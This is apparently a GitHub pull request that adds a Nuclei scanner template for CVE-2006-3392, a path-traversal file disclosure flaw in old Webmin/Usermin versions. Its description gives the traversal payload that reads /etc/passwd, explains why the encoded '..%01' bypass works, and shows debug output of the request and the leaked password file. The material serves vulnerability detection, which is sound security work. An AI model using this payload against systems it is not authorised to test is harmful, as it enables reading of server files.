### PR TITLE
Added CVE-2006-3392 - Webmin/Usermin Arbitrary File Disclosure

### DIFF
--- a/http/cves/2006/CVE-2006-3392.yaml
+++ b/http/cves/2006/CVE-2006-3392.yaml
@@ -11,17 +11,14 @@ info:
   remediation: |
     Update to Webmin 1.290 and Usermin 1.220 or later versions.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2006-3392
     - https://www.exploit-db.com/exploits/1997
     - https://www.exploit-db.com/exploits/2017
-    - http://www.webmin.com/changes.html
   classification:
     cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
     cvss-score: 5.0
     cve-id: CVE-2006-3392
     cwe-id: CWE-22
   metadata:
-    verified: false
     max-request: 1
     vendor: webmin
     product: webmin


### PR DESCRIPTION
### PR Information

- Added [CVE-2006-3392](https://nvd.nist.gov/vuln/detail/CVE-2006-3392) - Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure
- This is a classic directory traversal vulnerability that allows unauthenticated remote attackers to read arbitrary files from the server
- The vulnerability exists because `simplify_path` function is called before HTML decoding, allowing `..%01` sequences to bypass `../` removal

### Vulnerability Details

| Field                       | Value                                      |
| --------------------------- | ------------------------------------------ |
| **CVE ID**                  | CVE-2006-3392                              |
| **Affected Products**       | Webmin < 1.290, Usermin < 1.220            |
| **Vulnerability Type**      | Arbitrary File Disclosure / Path Traversal |
| **CVSS v2.0 Score**         | 5.0 (MEDIUM)                               |
| **CVSS v2.0 Vector**        | AV:N/AC:L/Au:N/C:P/I:N/A:N                 |
| **CWE**                     | CWE-22 (Path Traversal)                    |
| **Authentication Required** | No                                         |
| **Disclosure Date**         | 2006-06-29                                 |

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Exploit Path:**
```
/unauthenticated/..%01/..%01/..%01/.../etc/passwd
```

**Root Cause:**
The vulnerability occurs because Webmin's `simplify_path` function removes `../` sequences BEFORE HTML/URL decoding. Attackers bypass this by using `..%01` sequences, where `%01` gets decoded AFTER path simplification.

### Debug Output

```
❯ nuclei -t http/cves/2006/CVE-2006-3392.yaml -u http://[REDACTED]:10000 -debug

[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1

GET /unauthenticated/..%01/..%01/..%01/.../etc/passwd HTTP/1.1
Host: [REDACTED]:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
Accept: */*

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

[CVE-2006-3392] [http] [medium] http://[REDACTED]:10000/unauthenticated/.../etc/passwd
[INF] Scan completed. 1 matches found.
```

<img width="1013" height="806" alt="1" src="https://github.com/user-attachments/assets/7a437b85-93b1-4b85-b1ca-90e7dcfaada0" />

### Reproduce

```bash
nuclei -t http/cves/2006/CVE-2006-3392.yaml -u http://<target>:10000 -debug
```

### References

- https://nvd.nist.gov/vuln/detail/CVE-2006-3392
- https://www.exploit-db.com/exploits/1997
- https://www.exploit-db.com/exploits/2017
- http://www.webmin.com/changes.html
- http://www.kb.cert.org/vuls/id/999601
